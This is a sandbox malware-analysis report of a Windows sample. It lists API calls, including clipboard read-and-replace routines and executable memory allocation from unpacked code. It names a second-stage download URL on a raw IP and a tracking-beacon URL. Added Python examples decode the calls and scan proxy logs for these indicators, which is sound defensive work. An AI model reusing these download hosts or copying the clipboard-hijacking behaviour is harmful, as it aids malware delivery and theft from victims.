                                                      • Instruction Fuzzy Hash: E7F054B650011CFFEB214F95DD89EAFBA7CEB457E9F100175FA01B2150D6B19E009664
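Reading the raw argument dumps in these listings by hand is error-prone. The Python below is added here as an example; it is not part of Joe Sandbox or of this report. It parses lines in the report's own "APIs" notation and decodes the constants that matter for triage: the VirtualAlloc(00000000,?,00001000,00000004) call from the 046D0000 region (which the report marks "based on PE: false") is MEM_COMMIT with PAGE_READWRITE, and the RegCreateKeyExW(80000001,...,000F003F) / RegSetValueExW(...,00000001,...,00000004) pair above is HKEY_CURRENT_USER opened with KEY_ALL_ACCESS followed by a 4-byte REG_SZ write. The sample lines are copied from this page; the regex, function names, triage rules and the image end address 0x460000 passed to triage() are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: five "APIs" lines in the report's own notation (copied from
# the listings on this page). '?' is a value the sandbox could not resolve, and
# the lists run past each API's real parameter count because the sandbox prints
# the stack at the call site, so only the leading slots are decoded below.
SAMPLE_LINES = [
    "• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 046D024D",
    "• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE0",
    "• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF8",
    "• Sleep.KERNEL32(00001D1B), ref: 00401562",
    "• ExitThread.KERNEL32 ref: 0042DFEA",   # no argument list: the parser must accept this
]

API_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 constants used by the decoders.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x400000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE"}
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ"}
KEY_ALL_ACCESS = 0x000F003F


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # address of the call instruction


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet line; return None for lines that are not API calls."""
    m = API_RE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def _flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def _slot(call: ApiCall, i: int) -> Optional[int]:
    return call.args[i] if i < len(call.args) else None


def describe(call: ApiCall) -> str:
    """One-line decoding of the arguments that matter for triage."""
    if call.api == "VirtualAlloc" and _slot(call, 2) is not None and _slot(call, 3) is not None:
        return f"VirtualAlloc: {_flags(call.args[2], MEM_FLAGS)} {PAGE_PROT.get(call.args[3], hex(call.args[3]))}"
    if call.api == "RegCreateKeyExW" and _slot(call, 0) is not None and _slot(call, 5) is not None:
        root = HKEY_ROOTS.get(call.args[0], hex(call.args[0]))
        access = "KEY_ALL_ACCESS" if call.args[5] == KEY_ALL_ACCESS else hex(call.args[5])
        return f"RegCreateKeyExW: root={root} access={access}"
    if call.api == "RegSetValueExW" and _slot(call, 3) is not None and _slot(call, 5) is not None:
        return f"RegSetValueExW: type={REG_TYPES.get(call.args[3], hex(call.args[3]))} cbData={call.args[5]}"
    if call.api == "Sleep" and _slot(call, 0) is not None:
        return f"Sleep: {call.args[0]} ms"
    return f"{call.api}: (no decoder)"


def triage(lines: List[str], image_range: Tuple[int, int]) -> List[str]:
    """Flag the two patterns this report shows: writable memory committed from
    code outside the mapped image (an unpacking stub) and a HKCU key opened
    with KEY_ALL_ACCESS followed by a value write (a persistence candidate).
    image_range is the [start, end) of the on-disk image; its end is a caller
    assumption, since the report only states the base 0x400000."""
    lo, hi = image_range
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    notes = []
    for c in calls:
        if c.api == "VirtualAlloc" and _slot(c, 3) in (0x04, 0x40) and not lo <= c.ref < hi:
            notes.append(f"{c.ref:08X}: writable memory committed from a call site outside the mapped image")
    hkcu_full = any(c.api == "RegCreateKeyExW" and _slot(c, 0) == 0x80000001
                    and _slot(c, 5) == KEY_ALL_ACCESS for c in calls)
    if hkcu_full and any(c.api == "RegSetValueExW" for c in calls):
        notes.append("HKEY_CURRENT_USER key created with KEY_ALL_ACCESS and a value written: check the key path for persistence")
    return notes


if __name__ == "__main__":
    for call in filter(None, map(parse_api_line, SAMPLE_LINES)):
        print(f"{call.ref:08X} {describe(call)}")
    for note in triage(SAMPLE_LINES, image_range=(0x400000, 0x460000)):
        print("!", note)
```

The key path and value name are "?" in the report, so the registry note asks for manual review rather than naming a persistence location; the cbData of 4 means a REG_SZ of a single UTF-16 character plus terminator, which is worth confirming in the memory dump before drawing conclusions.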

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 42e084-42e0da; API calls in graph: ExitThread, CloseHandle, FreeLibraryAndExitThread
                                                      APIs
                                                        • Part of subcall function 00431F6E: GetLastError.KERNEL32(?,?,?,0042EADE,00434D8C,?,00431F18,00000001,00000364,?,0042DFF5,00457910,00000010), ref: 00431F73
                                                        • Part of subcall function 00431F6E: _free.LIBCMT ref: 00431FA8
                                                        • Part of subcall function 00431F6E: SetLastError.KERNEL32(00000000), ref: 00431FDC
                                                      • ExitThread.KERNEL32 ref: 0042E096
                                                      • CloseHandle.KERNEL32(?,?,?,0042E1B6,?,?,0042E02D,00000000), ref: 0042E0BE
                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1B6,?,?,0042E02D,00000000), ref: 0042E0D4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                      • String ID:
                                                      • API String ID: 1198197534-0
                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                      • Instruction ID: b2ee31e33066f08c21064793e861ac71cdb60266893f8cc669943c0e7c2b87c9
                                                      • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                      • Instruction Fuzzy Hash: D9F054306007307BD7315F37E80865B7E986F05B24F444A25FA24C36E1D768DD42869D

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 4023ab-40257f; API calls in graph: PostQuitMessage, DefWindowProcW
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 004023D2
                                                      • PostQuitMessage.USER32(00000000), ref: 00402574
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: MessagePostProcQuitWindow
                                                      • String ID:
                                                      • API String ID: 3873111417-0
                                                      • Opcode ID: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction ID: bd154e6284a73d9c96f0bb0b5cf215997dec60b9e2ffb7077fd2f9e149d03c68
                                                      • Opcode Fuzzy Hash: 82f44b76c14ec8efbf4c7d3be5e983ce5a0703e3b5b257b4754238f4299c4704
                                                      • Instruction Fuzzy Hash: 5241FD15AA4384A4E630EFA5BC55B2537B0FF64762F10253BE528CB2F2E3B68540C74E
                                                      APIs
                                                      • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Sleep
                                                      • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                      • API String ID: 3358372957-2681926500
                                                      • Opcode ID: b76e47030a2c47958d9b71dc8cf2ba090e0f0ec640c90ebfa7a7ba8d14f2146e
                                                      • Instruction ID: ace68ffdce9ad84b7101d27a91fbc7a6158b3f12708c11eec33b656b8e876d20
                                                      • Opcode Fuzzy Hash: b76e47030a2c47958d9b71dc8cf2ba090e0f0ec640c90ebfa7a7ba8d14f2146e
                                                      • Instruction Fuzzy Hash: 4D318C15AA538094E230CFA5BC66B252330FFA8752F51653BD60CCB2F2E3A19583C75E
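The two functions with network strings on this page, the InternetOpenW/InternetOpenUrlW function (agent string "ShareScreen", URL fragments "https://post-to-me.com/track_prt.php?sub=" and "&cc=DE") and the Sleep/_wcslen function above (string "http://176.113.115.37/ScreenUpdateSync.exe"), give three indicators to hunt for in web-proxy logs. The Python below is an added example, not part of the report; the host, path, URL and agent string are taken from the page, while the log format, log lines, client addresses and function names are constructed for the example. A bare user-agent match is scored "weak" because the string is not unique to this sample; host and URL matches are "strong".

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the String IDs and API arguments in this report.
BEACON_HOST = "post-to-me.com"
BEACON_PATH = "/track_prt.php"
PAYLOAD_HOST = "176.113.115.37"
PAYLOAD_URL = "http://176.113.115.37/ScreenUpdateSync.exe"
AGENT = "ShareScreen"          # lpszAgent argument of InternetOpenW

# Constructed log format for the example: <ts> <client> <method> <url> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample log: two hits from one client, one benign line, one line
# that only shares the user agent, and one unparseable line.
SAMPLE_LOG = [
    '2024-11-26T10:00:01Z 10.0.0.15 GET https://post-to-me.com/track_prt.php?sub=abc123&cc=DE "ShareScreen"',
    '2024-11-26T10:00:09Z 10.0.0.15 GET http://176.113.115.37/ScreenUpdateSync.exe "ShareScreen"',
    '2024-11-26T10:00:12Z 10.0.0.22 GET https://www.example.com/index.html "Mozilla/5.0"',
    '2024-11-26T10:01:30Z 10.0.0.31 GET https://cdn.example.net/update.exe "ShareScreen"',
    'garbage line that does not parse',
]

Finding = Tuple[str, str]   # (severity, reason)


def classify(url: str, ua: str) -> List[Finding]:
    """Score one request against the indicators; an empty list means no match."""
    parts = urlsplit(url)
    findings: List[Finding] = []
    if parts.hostname == BEACON_HOST and parts.path == BEACON_PATH:
        # The report shows the URL built from "...?sub=" plus a value plus "&cc=DE",
        # so both query parameters are recorded for later pivoting.
        q = parse_qs(parts.query)
        sub = q.get("sub", [""])[0] or "<empty>"
        cc = q.get("cc", [""])[0] or "<none>"
        findings.append(("strong", f"tracking beacon {BEACON_HOST}{BEACON_PATH} sub={sub} cc={cc}"))
    if url == PAYLOAD_URL:
        findings.append(("strong", "second-stage download ScreenUpdateSync.exe"))
    elif parts.hostname == PAYLOAD_HOST:
        findings.append(("strong", f"contact with payload host {PAYLOAD_HOST}"))
    if ua == AGENT:
        findings.append(("weak", f"user agent {AGENT!r} matches the InternetOpenW agent string"))
    return findings


def scan(lines: List[str]) -> List[Tuple[str, str, List[Finding]]]:
    """Return (client, url, findings) for every parseable line with a match."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # tolerate lines in another format
        findings = classify(m["url"], m["ua"])
        if findings:
            hits.append((m["client"], m["url"], findings))
    return hits


def strong_clients(lines: List[str]) -> List[str]:
    """Clients with at least one strong (host or URL) match: candidates for isolation."""
    return sorted({client for client, _, f in scan(lines) if any(s == "strong" for s, _ in f)})


if __name__ == "__main__":
    for client, url, findings in scan(SAMPLE_LOG):
        for severity, reason in findings:
            print(f"{client} {severity:6} {reason}  <- {url}")
    print("isolate:", strong_clients(SAMPLE_LOG))
```

Matching on hostname and path rather than on the full string keeps the beacon rule effective when the sub= value changes per campaign, and the payload host is matched separately from the exact URL so a renamed executable on the same server still surfaces.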
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,046D0223,?,?), ref: 046D0E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,046D0223,?,?), ref: 046D0E1E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: af0e8136091a2cdf0037daab132eba0617c6eeb2d2939769779a69df2bd63dac
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 68D0123154512877D7102A94DC09BCD7B1CDF05B66F008011FB0DD9180C770954046E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction ID: 5a7b2c84d62ad658203a61991ba47339364d8092704fd253d31609ac0f8472cb
                                                      • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                      • Instruction Fuzzy Hash: 2251B331A00218AFDB10DF69C840BEA7BA1EFC9364F19919AF8099B392C775FD42C754
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                      • Instruction ID: 9bd68947439e0ebb8ec9c9da6f1ebb3266b3b40cb9df12d6a59bf639d1a3d955
                                                      • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                      • Instruction Fuzzy Hash: 09317CF5604716AFC710DE29C88091ABFA8BF84356F04C63FF854A7391D739DA548B8A
                                                      APIs
                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402917
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                      • String ID:
                                                      • API String ID: 323602529-0
                                                      • Opcode ID: 42722672a66a49ce9ba729d8d5a11b6b274ac21bb896f056569fbc7f46f120ab
                                                      • Instruction ID: fd4b2128866d0e84e09fbcca1a55060ba5f89e368c9dd26e662fbef8df430bae
                                                      • Opcode Fuzzy Hash: 42722672a66a49ce9ba729d8d5a11b6b274ac21bb896f056569fbc7f46f120ab
                                                      • Instruction Fuzzy Hash: AC310AB4D00219AFDB14EFA5C881AEDBBB4BF48304F5081BEE515B3281DB786A48DF54
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID:
                                                      • API String ID: 3886170330-0
                                                      • Opcode ID: 8a35a6a311719fc8f305abf41c451562b85f8561cae7fd66b88796062af0805e
                                                      • Instruction ID: 879880b0c4f25b780129691f851e4e3dd9929a9e2b67da2182dc959f14ef4ac1
                                                      • Opcode Fuzzy Hash: 8a35a6a311719fc8f305abf41c451562b85f8561cae7fd66b88796062af0805e
                                                      • Instruction Fuzzy Hash: AB216D70600615EFCB11CF55C584E9EBBB5BF84705F14816EE405AB391C778AE50DF94
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction ID: c4c31d86981b08a4326d9d07fefb9558e2d41883e343640ddfed44868bdc2be0
                                                      • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                      • Instruction Fuzzy Hash: A411187590420AAFCF05DF58E94199B7BF4FF48314F10406AF809AB311D771EA15CBA9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction ID: f695aadca84356b0d8b9a61274b7bbdfef1310b8a9dd6365b425cc03820087b4
                                                      • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                      • Instruction Fuzzy Hash: B3F09A32810009BBCF115E96DC01DDB3F6AEF8D328F10011AF918A2150DA3ACA21ABA4
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction ID: fa7d64e0cb14044348f9bcc553febe5de5c9831e98ae767a6f681f11bdbd1c75
                                                      • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                      • Instruction Fuzzy Hash: 6BE0E5312002217ED6302F67AC07B5B36489F4ABA6F046133FD0592390DBACDE0181AD
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004103D7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID:
                                                      • API String ID: 2005118841-0
                                                      • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                      • Instruction ID: 76c106b1e19f55d0871e75195d63a97b43a3e3a633cf3d3d8d8c178ac06e9a64
                                                      • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                      • Instruction Fuzzy Hash: 15E02B3050020DB6CB147665EC1585D33385A00315B60413BBD24A14D1EF78E59E888E
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Deallocate
                                                      • String ID:
                                                      • API String ID: 1075933841-0
                                                      • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction ID: 9066955a54128b228038de65561ddb16510e1d4daca8eda005544cef135c0263
                                                      • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                      • Instruction Fuzzy Hash: 07D06771518612CEE374DF79E444656B7E4EF44710B20892FE4D9D2694E6759880CB44
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0043D0F5,?,?,00000000,?,0043D0F5,00000000,0000000C), ref: 0043CD37
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                      • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                      • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02C0DE8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 659db21d75cd6b4236a2990a8ff87d960c26659eb64a66354d5e760e4c4646bb
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 58113C79A00208EFDB01DF98C985E99BBF5EF08350F0580A4F9489B362D371EA50EF80
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D1951
                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 046D195B
                                                        • Part of subcall function 046DCE8D: _strlen.LIBCMT ref: 046DCEA4
                                                      • OpenClipboard.USER32(00000000), ref: 046D1988
                                                      • GetClipboardData.USER32(00000001), ref: 046D1998
                                                      • _strlen.LIBCMT ref: 046D19B4
                                                      • _strlen.LIBCMT ref: 046D19E3
                                                      • _strlen.LIBCMT ref: 046D1B27
                                                      • EmptyClipboard.USER32 ref: 046D1B3D
                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 046D1B4A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 046D1B74
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 046D1B7D
                                                      • GlobalFree.KERNEL32(00000000), ref: 046D1B84
                                                      • CloseClipboard.USER32 ref: 046D1BA8
                                                      • Sleep.KERNEL32(000002D2), ref: 046D1BB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                      • String ID: 4#E$i
                                                      • API String ID: 4246938166-2480119546
                                                      • Opcode ID: 5b51d03d70498e5785afc0acd32a98c695de96e9c46743eca59a432914eae742
                                                      • Instruction ID: 344c873bb541b04699efd8321dcb53af53807009c20303d6608126bd1becff6b
                                                      • Opcode Fuzzy Hash: 5b51d03d70498e5785afc0acd32a98c695de96e9c46743eca59a432914eae742
                                                      • Instruction Fuzzy Hash: C4510370D00385DAE311DFA4ED45BED7B64FF2A306F045229D901A6162FBB0AA85C769
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 046D23A9
                                                      • GetClientRect.USER32(?,?), ref: 046D23BE
                                                      • GetDC.USER32(?), ref: 046D23C5
                                                      • CreateSolidBrush.GDI32(00646464), ref: 046D23D8
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 046D23F7
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 046D2418
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 046D2423
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 046D242C
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 046D2450
                                                      • SetBkMode.GDI32(?,00000001), ref: 046D24DB
                                                      • _wcslen.LIBCMT ref: 046D24F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 1529870607-0
                                                      • Opcode ID: ae682b964db87196fcbae5751d0d0eb42e216528ddf26e84c8a3043db836e210
                                                      • Instruction ID: 2e46ad7a4424fa7feb0c8910a10892eb2058959de024ab42d21b36dae69fd42d
                                                      • Opcode Fuzzy Hash: ae682b964db87196fcbae5751d0d0eb42e216528ddf26e84c8a3043db836e210
                                                      • Instruction Fuzzy Hash: 8871EC72900218AFDB229F68DD85FAEB7BCEB09715F0041A5F609E6155DA70AF80CF14
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA9D,?,00000000), ref: 0043B817
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA9D,?,00000000), ref: 0043B840
                                                      • GetACP.KERNEL32(?,?,0043BA9D,?,00000000), ref: 0043B855
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: 248aba83eae64925ddcefa3866af59446adb897276384782e7e2bc649b3b24e4
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: 8321A422A00104A6D739AF14C801BA773AAEF98F50F56946AEA09DB210E736DE41C7D8
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0470BD04,?,00000000), ref: 0470BA7E
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0470BD04,?,00000000), ref: 0470BAA7
